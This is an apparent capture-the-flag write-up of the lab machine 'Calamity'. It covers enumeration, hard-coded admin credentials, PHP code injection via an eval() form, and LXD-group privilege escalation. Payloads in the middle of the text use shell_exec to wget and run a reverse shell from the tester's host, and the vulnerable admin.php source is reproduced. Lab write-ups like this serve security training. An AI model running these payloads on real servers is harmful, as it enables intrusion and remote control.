Offensive Security
Search…
10.10.10.27 - Calamity - php command injection
PHP code injection, Privilege Escalation through groups
Summary:
vulnerable software : Vulnerability in the PHP code
system vulnerable : 10.10.10.27
vulnerability explanation :
privilege escalation: LXD user given root permissions
severity : critical
Enumeration with nmap and masscan:
I used opendoor.py to discover critical directories that led to server compromise later on:
Command run:
1
python ./opendoor.py --host 10.10.10.27 -s directories -t 50
Copied!
Credentials exposed in the source code of admin.php:
​
Successful login with user:admin and password:skoupidotenekes and command injection when using <?php phpinfo() ?> in "Your HTML" form:
​
Gaining Access:
Since we have a command injection in a PHP code we can issue to download a shell x.php:
<?php echo shell_exec("wget http://10.10.14.16:8000/x.php -O /var/tmp/x.php 2>&1");?>
wget saving shell to /var/tmp/x.php
In the same manner execute: <?php echo shell_exec("php /var/tmp/x.php 2>&1");?> to gain a reverse shell on the port we set up earlier:
Content of admin.php responsbile for command injection:
1
[email protected]:/var/www/html$ cat admin.php
2
cat admin.php
3
<?php
4
​
5
if (!isset($_COOKIE['adminpowa'])) {
6
?>
7
<html><body>
8
​
9
<form method="post">
10
Password: <input type="text" name="user"><br>
11
Username: <input type="password" name="pass">
12
<input type="submit" value="Log in to the powerful administrator page">
13
<!-- password is:skoupidotenekes-->
14
</form>
15
</body></html>
16
<?php
17
if(isset($_POST['user']) && isset($_POST['pass'])){
18
$u = $_POST['user'];
19
$p = $_POST['pass'];
20
​
21
if ($u=="admin" && $p=="skoupidotenekes") {setcookie("adminpowa", "noonecares"); header("refresh: 0;");}
22
else{echo "GET OUT OF HERE ";}
23
}
24
​
25
​
26
}
27
?>
28
​
29
<?php
30
if (isset($_COOKIE['adminpowa'])) {
31
?>
32
​
33
<html>
34
<title>GOT U BEEJAY</title>
35
<body>
36
TADAA IT HAS NOTHING
37
<br>
38
what were you waiting for dude ?you know I aint finished creating<br>
39
xalvas,the boss said I am a piece of shit and that I dont take my job seriously...but when all this is set up...Ima ask for double the money<br>
40
just cauz he insulted me <br>
41
Maybe he's still angry at me deleting the DB on the previous site...he should keep backups man !
42
<br>
43
anyway I made an html interpreter to work on my php skills !
44
​
45
It wasn't easy I assure you...I'm just a P-R-O on PHP !!!!!!!!!
46
<br>
47
access in here is like 99% secure ,but even if that 1% reaches this page ,there's nothing they can do !
48
<br>
49
html is super-harmless to our system!
50
Try writing some simple stuff ...and see how difficult my job is and how underpaid I am
51
​
52
​
53
​
54
<form method="get">
55
Your HTML: <input type="text" name="html"><br>
56
<input type="submit" value="SHOW ME DA PAGE">
57
</form>
58
</body></html>
59
<?php
60
//print "\$myvar=\"test\";phpinfo();\n";
61
$x = $_GET['html'];
62
$cmd="?>" . $x;
63
eval($cmd); //what could possibly go wrong ?
64
//echo $myvar;
65
​
66
}
67
?>
Copied!
Explanation of the vulnerable part of the code:
​
1
eval [arg ...]
2
The args are read and concatenated together into a single com-
3
mand. This command is then read and executed by the shell, and
4
its exit status is returned as the value of eval. If there are
5
no args, or only null arguments, eval returns 0.
Copied!
On a different note, mysterious recording recov.wav contains "never give you up by rick astley". Well done there.
Privilege escalation:
1) Look at the differences in wav files
2) Privesc through groups:
uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
​
Last modified 3yr ago
Copy link